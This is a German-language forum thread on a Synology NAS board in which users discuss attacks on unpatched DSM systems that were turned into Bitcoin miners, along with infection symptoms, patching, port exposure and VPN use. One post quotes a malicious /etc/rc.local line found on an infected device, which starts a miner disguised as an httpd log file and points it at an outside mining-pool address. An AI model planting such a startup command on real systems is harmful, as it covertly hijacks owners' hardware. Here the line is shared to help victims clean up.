Aktive Hackangriffe auf DSM Versionen kleiner 4.3.-3810 Update 3

  • Lange schon haben wir uns gewünscht, diese Mitteilung veröffentlichen zu können. Seit langer Zeit planen wir den Umzug auf neue Server und nun ist es geschafft. Um euch einen Einblick hinter die Kulissen zu geben haben wir einen extra Beitrag geschrieben:

    Das Forum hat eine neue Heimat bei netcup gefunden

    Wir möchten uns ganz herzlich bei netcup bedanken! necup stellt uns die neuen Server. Schaut mal in unsere Beiträge, was sich durch den Umzug alles verbessert hat.

Madberlin

Benutzer
Mitglied seit
30. Sep 2013
Beiträge
24
Punkte für Reaktionen
0
Punkte
0
@Matthieu Danke dann werde ich es mal machen, auch wenn ich bisher nicht wirklich Anzeichen für ein Hack habe, Sicher ist Sicher :)

Gruß Madberlin
 

OSRA_Ackermann

Benutzer
Mitglied seit
22. Feb 2014
Beiträge
4
Punkte für Reaktionen
0
Punkte
0
Hallo zusammen,

noch ein "Fundstück" aus der /etc/rc.local; glücklicherweise hatte ich /var/run/httpd-log.pid
schon recht früh gelöscht.

OSRA_DS411> more /etc/rc.local
/var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3344

Also nichts mehr mit "nach-hause-telefonieren".

Weiss rein zufällig jemand, wie man in Apache solche Sachen blocken kann?

Besten Dank im Voraus.

Grüsse aus dem Rheinland
OSRA.Ackermann

PS: Mangels besserem Wissen, wie ich die Busybox-Links (s.o.) wieder herstellen kann,
habe ich die entsprechenden Shell-Scripte bereinigt.
 

Falkenfelser

Benutzer
Mitglied seit
15. Jun 2013
Beiträge
285
Punkte für Reaktionen
2
Punkte
18
Tja, Synology bastelt mit jeder neuen Beta an Icons und bunten Bildchen rum
aber die Sicherheit bleibt auf der Strecke. Demnächst haben wir noch Dropbox
und Soziale Netzwerke eingebunden. Mal sehen wie viele Sicherheitslücken sich
in Zukunft noch offenbaren werden.

Schade das es in diesem Forum immer noch keine eigene Kategorie für "SICHERHEIT" gibt :mad:
 

Matthieu

Super-Moderator
Teammitglied
Mitglied seit
03. Nov 2008
Beiträge
13.200
Punkte für Reaktionen
81
Punkte
344
@OSRA_Ackermann: Was genau möchtest du blocken? Ich glaube nicht dass httpd-log etwas mit dem Apache zu tun hat - die Schadsoftware tarnt sich nur unter diesem Namen.
@Falkenfelser: Du bist dir schon darüber im klaren dass wir hier seit einem Vierteljahr immer über die gleichen Lücken reden? Jeder der jetzt betroffen ist hat in diesem Zeitraum nicht gehandelt sondern das System ungepatcht gelassen.

MfG Matthieu
 

bfpears

Benutzer
Mitglied seit
09. Feb 2009
Beiträge
449
Punkte für Reaktionen
29
Punkte
28
@Matthieu: was hat denn das eine mit dem anderen zu tun?

Ist denn jetzt wirklich klar welches Update welche Lücke behoben hat?
Oh, ich sehe gerade das Synology in den Release Notes ein paar CVE Nummern nach gepflegt hat.

http://www.heise.de/security/meldung/Synology-NAS-Geraete-als-Bitcoin-Miner-missbraucht-2113423.html
Wenn ich den Heise Artikel richtig gelesen habe mussten beide Sicherheitslücken offen sein.
Aber im englischen Forum haben mehrere behauptet mit Version: 4.3-3810 Update 3 betroffen zu sein!

Ich bin seit ich von der http://www.andreafabrizi.it/?exploits:dsm Lücke weiß, deutlich sensibeler geworden.
Ich habe mich mit meiner 109+ (max DSM 4.2) beim Synology Newsletter angemeldet:
Am 24.1 bekam ich Nachricht über ein wichtiges Update 4.3-3810 Update 4 vom 09.01.2014 (also nur 15 Tage nach dem Release) das aber nur eine Lücke im SMB flickt. (Hätte ich wenn ich gekonnt hatte gar nicht installiert, bin alleine in meinem Netz)
Am 17.2 kam dann die Update News über die hier diskutiert wurde (nur 3 Tage nach der offiziellen (englischen) Presse Meldung)
Nachricht das ein Update für DSM 4.2 da ist habe nicht bekommen (ist ja angeblich auch kein Sicherheitsfix) und die automatische Update Prüfung hat sich ja auch nicht gemeldet weil vom Bug betroffen.

Welche Ports/Freigaben waren denn jetzt eigentlich betroffen nur 5000/5001 oder auch separate Freigaben für Filestation oder Audiostation. Oder auch die PhotoStation obwohl sie eigentlich auf dem anderen Webserver läuft?

Das jetzt immer noch (wiederholt) über den Befall diskutiert wird finde ich auch nicht so nötig, aber jeder der auch verzögert für das Thema Sicherheit sensibilisiert wird ist wichtig.

@Matthieu: ich glaube du gehörst zu den Leuten die anderen immer davon abraten den Port 5000/5001 nach außen freizugeben, aber leider hören immer weniger auf dich. Sicherheit ist in den Köpfen der Leute noch nicht angekommen.
 

Falkenfelser

Benutzer
Mitglied seit
15. Jun 2013
Beiträge
285
Punkte für Reaktionen
2
Punkte
18
Was wäre denn besser? Außer den Port erst gar nicht zu öffnen...
Über 443 und intern auf 5001 umleiten oder gleich einen ganz anderen Port wählen?
Damit ist das Problem aber immer noch nicht gelöst.

Zudem wundert mich das solche Probleme immer bei Login Sachen auftreten bzw.
sehr spät gefixt werden. Ist fast wie bei dem Desaster mit den AVM Routern.
Eigentlich kann man da nur noch von Vorsatz ausgehen.
 
Zuletzt bearbeitet:

tscheuneheuner

Benutzer
Mitglied seit
29. Mrz 2010
Beiträge
9
Punkte für Reaktionen
0
Punkte
0
Hi,

ich habe mir vermutlich auch den Miner drauf. Bei mir ist die CPU Last bei aktiver I-Net Verbindung 100%. Habe ich den I-Net Traffic geblockt, so ist die Last immernoch bei 50%. Problem ist, dass ich SSH ausgeschalten habe. Per Assistent und Webadmin komme ich nicht drauf. Bekomme höchstens den Anmeldebildschirm angezeigt (Trage Benutzer und Pass ein, aber nichts passiert). Auch ein RESET mit 4Sek. + 4Sek. bringt nichts. Ich bekomme keinen quittierungston nach 4 Sek. sondern nach ca. 10 Minuten. Kann mir jemand sagen, wie ich an die Daten komme.
Ach übrigens ich hatte die Syno nur als SMTP Relay offen. D.h. nur Port 110 und 25 wurden weitergeleitet an die Syno. Sonst war diese nicht zu erreichen von aussen!! Daher würde ich laut dem Hersteller nicht nur auf die bekannten Port 5000 5001 vertrauen!!!!

Gruß
 

bfpears

Benutzer
Mitglied seit
09. Feb 2009
Beiträge
449
Punkte für Reaktionen
29
Punkte
28
kein Vorsatz!
Ich gehe mal davon aus das in letzter Zeit die Tools um Lücken zu finden viel besser geworden sind und dadurch auch mehrere entdeckt wurden.
Wenn du etwas programmiert hast weißt du ja auch wie es funktionieren soll und benutzt es auch so, auf die Idee Optionen ganz anders zu verwendet kommt man ja erst mal nicht.

Freigaben:
erst mal überlegen was man wirklich braucht? Und wer es braucht!
Über VPN nachdenken! (wobei ich auch nichts davon halte einer dubiosen Smartphone - App meine VPN Daten anzuvertrauen, dazu kommt die Möglichkeit auf Verlust des Geräts)
Ich habe nur FTP, Photostation und Webstation offen.
Und weit weg von den Standard Ports (sowas wie 25001). Das beseitigt zwar nicht die Sicherheitslücke, aber es dauert deutlich länger den offenen Port zu finden. Wenn es jemand auf dich abgesehen hat hilft das aber nicht.
 

Falkenfelser

Benutzer
Mitglied seit
15. Jun 2013
Beiträge
285
Punkte für Reaktionen
2
Punkte
18
Dann schau dir das Video an http://www.heise.de/video/artikel/AVM-Router-laesst-sich-auch-ohne-Fernzugang-kapern-2116590.html und sag mir nochmal das es sich dabei nicht um Vorsatz handelt. Es ist immer schlimmer als man denkt. Wenn Zugangsdaten im Klartext auf fremden Servern abgeliefert werden können... Ist ja wirklich ein ganz komischer Fehler. Da braucht es wirklich nicht viel Fanatsie um zu erkennen, das mit diesem angeblich unbeabsichtigten Fehler noch andere Interessen einhergehen. Mit solchen Lücken kann man auch super Geld machen oder Industriespionage betreiben. Und solange es keiner meldet schaut AVM einfach weg oder kassiert noch Geld dafür...
 

Matthieu

Super-Moderator
Teammitglied
Mitglied seit
03. Nov 2008
Beiträge
13.200
Punkte für Reaktionen
81
Punkte
344
@Matthieu: ich glaube du gehörst zu den Leuten die anderen immer davon abraten den Port 5000/5001 nach außen freizugeben, aber leider hören immer weniger auf dich. Sicherheit ist in den Köpfen der Leute noch nicht angekommen.
Das ist durchaus richtig, ich habe ja nicht aus Spaß auch eine Security-Checkliste geschrieben und im Forum veröffentlicht.
Man muss das allerdings auch in Relation betrachten: Ich hänge beispielsweise am T-Mobile Mobilfunknetz und kann darüber keine VPN-Verbindung aufbauen (nicht mal SSH funktioniert ...). Der Zugriff auf Port 5001 ist für mich trotzdem notwendig. Anregungen zur Absicherung hast du ja schon gegeben, aber nicht immer lässt sich eben alles umsetzen. Deswegen sollte man stets auf der Hut sein.

Das Argument mit dem Newsletter ist für mich ein sehr schwaches. Aus dem gleichen Grund, aus dem ich seit Jahren auch alle Windows-Systeme an denen auch andere User arbeiten auf automatische Updates stelle. Es ist immer wieder erschreckend wie stiefmütterlich das Thema behandelt wird. Auch die DSen können selbst nach Updates suchen.

@Falkenfelser: Vorsatz würde bedeuten, dass Synology beschließt, an bestimmten Stellen Lücken zu lassen. Warum trifft es immer den Login? Ganz einfach, weil er das lukrativste ist und weil er an vorderster Front steht. Wenn man einen Dienst öffentlich anbietet, hat man häufig nicht viel mehr als den Login einem Angreifer entgegen zu setzen. Dementsprechend "anziehend" sind solche Logins bzw. deren Umgehung für gewisse Personengruppen. Hat man das geknackt ist man drin. Dementsprechend ist es auch nicht verwunderlich dass es möglich ist bestimmte Daten auszulesen - man ist ja im System. Der Upload auf einen externen Server sind dann nicht mehr als ein paar Codezeilen.
Große Konzerne unterhalten sogar eigene Hackertruppen um die eigenen Produkte zu überprüfen. Ein weiteres, beliebtes Mittel sind externe Audits durch "bezahlte Whitehats". Und trotzdem zahlen einige Unternehmen große Summen für entdeckte und vernünftig gemeldete Lücken. Das machen sie wohl kaum als Ansporn für ihre eigenen Teams ...

MfG Matthieu
 

MieserTyp

Benutzer
Mitglied seit
20. Feb 2014
Beiträge
66
Punkte für Reaktionen
0
Punkte
0
Wenn das so aussieht ist alles io?
ssh.jpg
 

Matthieu

Super-Moderator
Teammitglied
Mitglied seit
03. Nov 2008
Beiträge
13.200
Punkte für Reaktionen
81
Punkte
344
Wenn das so aussieht ist alles io?
Von dem einen Befehl lässt sich das nicht sagen. Es gibt verschiedene Formen der Malware, deswegen sind nur noch einige der Befehle wirkliche Indikatoren.

MfG Matthieu
 

Oli28

Benutzer
Mitglied seit
13. Dez 2009
Beiträge
110
Punkte für Reaktionen
0
Punkte
16

fromage

Benutzer
Mitglied seit
15. Apr 2014
Beiträge
2
Punkte für Reaktionen
0
Punkte
0
Hallo,
ich frage mich gerade ob man das SSL Zertifikat erneuern muss, oder ob man nach dem Update von DSM nichts mehr tun muss.
Lg Florian
 

Frogman

Benutzer
Mitglied seit
01. Sep 2012
Beiträge
17.485
Punkte für Reaktionen
4
Punkte
414
Nicht im Kontext des Mining-Bugs, um den es hier im Thread ging - allerdings gibt gerade Ärger wegen des Heartbleed-Bugs (den Du hier im Forum auch findest), und in dessen Folge sollte man nach dem Fix/Update dann durchaus darüber nachdenken, die Zertifikate zu wechseln.
 
NAS-Central - Ihr Partner für NAS Lösungen